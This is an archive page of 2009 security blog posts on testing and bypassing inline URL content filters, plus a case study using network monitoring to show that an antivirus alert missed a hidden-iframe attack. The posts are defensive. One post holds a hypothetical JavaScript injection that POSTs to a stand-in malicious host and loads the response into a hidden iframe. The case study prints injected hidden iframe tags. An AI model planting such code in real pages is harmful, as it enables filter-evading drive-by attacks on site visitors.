Archive for June, 2009

Test your inline URL content filter

Posted in NSM on 29 June, 2009 by Alec Waters

Following on from this post, here’s an easy way to see what your content filter does and does not check. The steps are:

  1. Visit http://wirewatcher.net/urlfiltertest/testit.aspx
  2. Check your content filter logs to make sure there’s an impression.
  3. Click the “Submit me via GET” button. The page will refresh, albeit with the same content as it had originally.
  4. Check your content filter logs to make sure there’s an impression.
  5. Click the “Submit me via POST” button. The page will refresh, albeit with the same content as it had originally.
  6. Check your content filter logs to make sure there’s an impression. If there isn’t one, then your content filter isn’t being queried for POST requests.
  7. Visit http://wirewatcher.net:50000/urlfiltertest/testit.aspx
  8. Repeat steps 2 – 6 above. If you get no pages back at all, then it’s likely that there is some degree of egress filtering going on to prevent you from seeing the page (a good thing!). If there are no log impressions on the content filter, then your content filter isn’t being queried for HTTP on nonstandard ports.
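
If you’d rather drive the tests from a shell than from the page’s buttons, something like curl can generate equivalent traffic. This is a sketch – the POST body below is a dummy payload rather than the page’s real form fields, but any POST to the URL should be enough to test for a log impression:

# step 1: a plain GET on port 80
curl http://wirewatcher.net/urlfiltertest/testit.aspx
# step 5 equivalent: a POST to the same page
curl -d 'test=1' http://wirewatcher.net/urlfiltertest/testit.aspx
# step 7: a GET on a nonstandard port
curl http://wirewatcher.net:50000/urlfiltertest/testit.aspx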

If you want to, please post your results as comments, together with:

  • The brand of content filter software
  • The type of intermediate device that is querying the content filter (router, firewall, proxy, etc.)


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Sidestepping inline URL content filters

Posted in NSM on 26 June, 2009 by Alec Waters

Picture the scene – you have a small office network with a single gateway device hooking you up to the Internet. The gateway device performs your basic firewall and NAT tasks, and also hooks into some kind of URL filter server like Websense or McAfee SmartFilter. The URL filter will categorise all websites that people ask for, and will permit or deny access to them according to some defined policy. The trigger for this categorisation is the border device – it must look out for HTTP requests passing through it and act on them like this:

  1. The border device sees an HTTP request passing through it, heading outbound from the office network.
  2. The border device allows the request to carry on to its destination.
  3. When the response arrives, the border device will hold onto it and not release it back to the requester.
  4. Whilst the request is heading off to its destination, the border device parses out the URL and passes it off to the URL filter server (Websense/McAfee/whatever).
  5. The URL filter server will categorise the requested URL, apply a policy to it, and send a yes-or-no response back to the border device.
  6. If the response is a ‘yes’, the border device releases the response held in step 3 and the user will see their webpage.
  7. If the response is a ‘no’, the border device throws away the held response and instead returns an HTTP redirect to the user which will take them to some kind of blockpage telling them why their request was denied.

Organisations usually use this technology for applying some kind of HR-sanctioned policy (no porn, no warez, etc.), but there’s a strong security angle to its use, too.

McAfee SmartFilter has the option to ‘block’ certain categories you choose. It can also ‘warn’ instead of block – the difference is that the user can bypass a warn page, whereas a blockpage is a total dead end. Consider a security-only policy that looks like this and is designed to defend against common web threats like injected hidden iframes etc:

  • The policy will ‘block’ on anything that is categorised as being in any way malicious. Hopefully, if the URL filter vendor is doing their job properly, commonly injected URLs will fall into this category pretty quickly.
  • The policy will ‘warn’ on anything that is uncategorised. New websites turn up every nanosecond, so clearly the URL filter vendors are always playing catch-up. In the case of something like Conficker, frequent new URLs are part of its C&C strategy, so we have to exercise caution when allowing users to see uncategorised websites.

Why is this an effective strategy? Well, if an injected hidden iframe is categorised as Malicious, the hidden iframe will contain our URL filter’s blockpage instead of the malicious content and the user is saved. Likewise, if the iframe’s content is uncategorised, it will contain the warn page instead of the mischief – again, the user is saved.

Warning on uncategorised as opposed to outright blocking has the happy side effect that the user can proceed to view uncategorised sites that they have explicitly asked for. There’s no way a user can bypass a warn page that’s in a hidden iframe!

Clearly, this strategy isn’t 100% effective – it’s a preventative measure, after all, and prevention eventually fails. You’re primarily at the mercy of the accuracy and timeliness of the URL filter vendor’s categorisations, which can of course let you down. Having said that, from personal experience this is an extremely effective technique for keeping out the majority of today’s web-based attacks on desktop machines.

At this point, let’s think back to step four above:

“Whilst the request is heading off to its destination, the border device parses out the URL and passes it off to the URL filter server”

The key phrase here is “parses out the URL” – the border device actually needs to inspect the traffic passing through it and decide that something is or is not an HTTP request. Clearly, each vendor will have their own ways of doing this, and I can only really speak for Cisco kit here because that’s where my experience lies.

I’ve been finding that certain classes of web-based attacks take measures that sidestep URL content filtering which might otherwise prevent delivery of the attack code to the browser. Whether this sidestepping is deliberate isn’t something I can tell you, but it does happen, even if only by accident.

The first sidestepping technique is to use a nonstandard port. There have been lots of .cn-targeted iframes injected recently, and their latest trick is to use port 8080 instead of 80. Why is this effective? It’s effective because (for Cisco at least) in order to parse out a URL the border device must first recognise the traffic as HTTP, a step typically taken by looking at destination port numbers. A Cisco will, by default, only inspect traffic on port 80, so our iframes targeting port 8080 will not be vetted by the URL filter at all and will be delivered to the user’s browser:

router#show ip port-map http
Default mapping:  http   tcp port 80   system defined

Oops. To fix this, you can either:

  • Apply some kind of egress filtering so that users can only see a subset of destination ports, or
  • Explicitly tell your Cisco to inspect more ports for HTTP, giving a port-map like this (the configuration commands are sketched after the output):
router#show ip port-map http
Default mapping:  http   tcp port 80     system defined
Default mapping:  http   tcp port 8080   user defined
Default mapping:  http   tcp port 8000   user defined
Default mapping:  http   tcp port 8001   user defined
Default mapping:  http   tcp port 8801   user defined
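
For reference, the user-defined mappings above are created with Cisco’s Port-to-Application Mapping (PAM) feature. The exact syntax varies with IOS version (newer images take a protocol keyword, older ones omit it), so treat this as a sketch rather than gospel:

router#configure terminal
router(config)#ip port-map http port tcp 8080
router(config)#ip port-map http port tcp 8000
router(config)#ip port-map http port tcp 8001
router(config)#ip port-map http port tcp 8801
router(config)#end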

Clearly the problem here is that there are over 65000 ports for the baddies to choose from…

The second sidestepping technique is to modify the HTTP verb that is used to fetch the mischief. For example, Waledac will use HTTP POSTs instead of GETs when communicating with its C&C servers. Waledac’s authors probably chose this verb because of the amount of data they want to upload, but it has an unpleasant side effect. Sadly, a Cisco will only pass GET URLs to the URL filter server – POSTs are ignored and passed straight through, just like traffic on a non-HTTP port. I don’t think it would take much for some injected JavaScript on a legitimate page to output a form, POST it to a malicious server and put the response into a hidden iframe…
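
To illustrate, here’s a hypothetical sketch of what such an injection might look like – this is made up for illustration, not captured attack code, and the server name and form field are inventions:

<script>
// a hidden iframe to receive the POST's response
document.write('<iframe name="sink" width=0 height=0 style="hidden" frameborder=0></iframe>');
// a form that POSTs to the malicious server, targeting the hidden iframe
document.write('<form id="f" method="POST" action="http://bad.server.example/count.php" target="sink">' +
               '<input type="hidden" name="o" value="2"></form>');
// submitting it fetches the mischief via a verb the URL filter never sees
document.getElementById('f').submit();
</script>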

I have no idea if other inline URL filter devices are susceptible to the same sidesteps, but Cisco ones definitely are. Whether they intended to or not, the bad guys are bypassing yet another layer of preventative defensive measures – it’s yet another thing for us all to look out for!

Comments welcome.

There is an update to this post here.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Listening for the Grasshopper

Posted in Case Studies, NSM on 25 June, 2009 by Alec Waters

Here’s a case study I originally wrote for SecurityMonkey’s blog, tidied up a bit, and with a somewhat less monkey-related theme:

Listening for the Grasshopper

Hope you find it interesting. Comments welcome!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Prevention Eventually Fails, part one

Posted in NSM on 19 June, 2009 by Alec Waters

Here’s a quick example of preventative measures (in this case anti-virus) failing, and how NSM can help us out.

The scenario:

An AV alert is raised saying that a nasty threat has been detected and removed from a machine. The staff responsible for the organisation’s servers and workstations rejoice – another success for their fine security measures!

Meanwhile, the network security staff also see the alert, and decide to do some digging of their own. The AV alert says something along the lines of:

“Hello, I have deleted an instance of JS/Tenia.d on a machine at 10.6.7.130 from C:\Documents and Settings\some.user\Local Settings\Temporary Internet Files\Content.IE5\some.directory\somefile[1].htm at 1/22/09 10:48:03 AM”

OK, so AV has removed a file from IE’s cache. Let’s research the threat a little – it says that it’s a detection of <iframe> tags after the document’s closing </html> tag. Minimally, this is malformed HTML – at worst, it’s some hostile code targeting the user’s browser.

But AV caught it, and we’re safe…

…right?

The NSM methodology advocates the validation of all reported security events, such as those fired by automated systems like AV and IDS. We can leap into action here and satisfy ourselves that AV did its job and that we are, indeed, in the clear.

The first task is to work out where the suspect HTML came from in the first place. We know the name of the file from the AV report, and if we really wanted to we could parse the user’s IE history to find out where it came from.

But we don’t want to do something so grubby as interfering with someone’s machine. For one thing, our investigation will leave a forensic footprint on the machine that may hinder a subsequent examination. If we discover evidence of an actual crime, we don’t want our meddling with the machine to have inadvertently destroyed any evidence or introduced any artefacts that a defence barrister could use to discredit us. Let’s leave the machine alone and see what the network can tell us.

We know when the AV alert was raised, and we know the IP address of the infected machine. From this and from the full-content data we’ve been capturing, we can build a picture of the user’s browsing activity. If we locate the capture file that spans the time period we’re interested in, we can invoke a little tshark-fu:

tshark -r yourfile.pcap -R "http.request and ip.src eq 10.6.7.130" \
-T fields -e frame.time -e http.host -e http.request.uri

This will give us a brief account of 10.6.7.130’s web browsing history, based upon what tshark can understand as an HTTP request (so we’re not going to see any HTTP on odd ports, for example, but it’s a good start!).
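
As an aside, if you do suspect HTTP on an odd port (like the port 8080 iframes from the earlier post), tshark can be told to dissect a given port as HTTP with its decode-as option. A sketch:

tshark -r yourfile.pcap -d tcp.port==8080,http \
-R "http.request and ip.src eq 10.6.7.130" \
-T fields -e frame.time -e http.host -e http.request.uri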

Alternatively, there may be other sources of information at our disposal. We may have proxy server logs, or URL filter logs, etc. However we do it, we will be able to determine the user’s browsing history without touching their machine.

Once we’ve got the history, we need to find somefile[1].htm. The “[1]” part is put there by IE when the file is cached, so we’re really after somefile.htm. We can look back through the user’s history and locate the full URL, based upon the time of the AV detection and the name of the file. This snippet came from the URL filter server scrutinising the user’s web browsing activity:

Jan 22 2009 10:42:47 10.6.7.130 Accessed URL

http://some.server/somefile.htm

This looks like it. There is a discrepancy in the timings, though. The timestamp above came from the carefully-synchronised device that performed the URL filtering. The timestamp in the AV report came from the suspect computer, whose clock is clearly a little out!

Now, to see if this file really is hostile (as AV claims), we can either fetch this URL in our carefully controlled lab environment, or we can extract it from the full-content capture.
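
If we take the capture route, one way to do it (a sketch, assuming the page came over plain HTTP on port 80) is to reassemble the TCP streams with a tool like tcpflow and then hunt for the request:

# reassemble every port-80 conversation involving the suspect machine into files
tcpflow -r yourfile.pcap 'host 10.6.7.130 and port 80'
# find the flow containing the request; the response lives in the matching
# file with source and destination reversed
grep -l 'GET /somefile.htm' *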

Once we’ve recovered somefile.htm, we can see that there are indeed <iframe> tags after the closing </html> tag (hidden ones, too). Woohoo! AV did save us! The server and workstation team are laughing at us for expending all this effort to confirm what they already know! They’re on their way to the Bosses right now to explain how useless the NSM team is, and how all the NSM budget should be transferred to them! They’re planning the farewell party for when the imminently-redundant NSM team gets fired as a waste of resources!

Whilst all of this is going on, the NSM team continue the investigation by thinking about how a file moves from a web server to IE’s cache directory:

  • A file only gets into the IE cache directory once IE has downloaded it.
  • If IE has downloaded it, it means that IE has likely rendered it.
  • If it has rendered it, it means that any hostile code has already been executed.

Theory: deleting something from IE’s cache isn’t necessarily as good a thing as one might think. You may have been compromised by the hostile page, even though AV is claiming to have saved you.

How can we prove it, one way or the other?

We can carry on looking through the user’s network history that we’ve assembled already. We’ve carefully fetched the infected file, so we can see the URLs that were in the hidden <iframe>s. Did the user fetch these? If AV has been effective, we won’t see any trace of the <iframe>s being acted on.

Looking at our hostile file we see three hidden <iframe>s in it:

<iframe src="http://bad.server.one/count.php?o=2" width=0 height=0
style="hidden" frameborder=0 marginheight=0 marginwidth=0></iframe>
<iframe src="http://bad.server.two/count.php?o=2" width=0 height=0
style="hidden" frameborder=0 marginheight=0 marginwidth=0></iframe>
<iframe src="http://bad.server.three/count.php?o=2" width=0 height=0
style="hidden" frameborder=0 marginheight=0 marginwidth=0></iframe>

…and our URL history shows this:

Jan 22 2009 10:42:48 10.6.7.130 Access denied URL

http://bad.server.one/count.php?o=2

OK, a denied attempt on bad.server.one. It was blocked because the URL filter server (another preventative measure that was employed in this instance) decided that bad.server.one was malicious and that the user shouldn’t be allowed to fetch content from it. If we check the HTTP referrer for this request (either from the URL filter logs or by extracting it from our full-content capture) we can see that it was the file that AV was complaining about in the first place:

GET /count.php?o=2 HTTP/1.1
Host: bad.server.one
Referer: http://some.server/somefile.htm
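
Pulling that header out of the full-content capture is another quick bit of tshark-fu – a sketch:

tshark -r yourfile.pcap -R 'http.request.uri contains "count.php"' \
-T fields -e frame.time -e http.host -e http.request.uri -e http.referer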

This is proof that AV did not save us from anything at all. The threat was allowed to execute, and an attempt was made to download malicious content. The smug server/workstation team were not defended at all, and, even worse, were lulled into a false sense of security by the misleading AV report.

Time to cancel that farewell party, chaps.

There’s just one piece of the puzzle left to explain. Three <iframe>s were present, but only one was observed to be fetched by the browser. Why was this?

If we expand our analysis of the full-content capture we can see why. We can see DNS queries for bad.server.one, bad.server.two and bad.server.three, but only the query for bad.server.one actually comes back with an IP address – the other two come back as “no such name”. If there’s no DNS lookup, no TCP connection can be made to fetch the content for the second and third <iframe>s.
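
The DNS side of this can be pulled from the same capture; an rcode of 3 means “no such name”. A sketch:

tshark -r yourfile.pcap -R "dns and ip.addr eq 10.6.7.130" \
-T fields -e frame.time -e dns.qry.name -e dns.flags.rcode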

The moral of the story is that your AV solution might not be telling you the whole truth. Use NSM techniques to fully investigate the circumstances surrounding the alert, and satisfy yourself that nothing bad is going on!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk
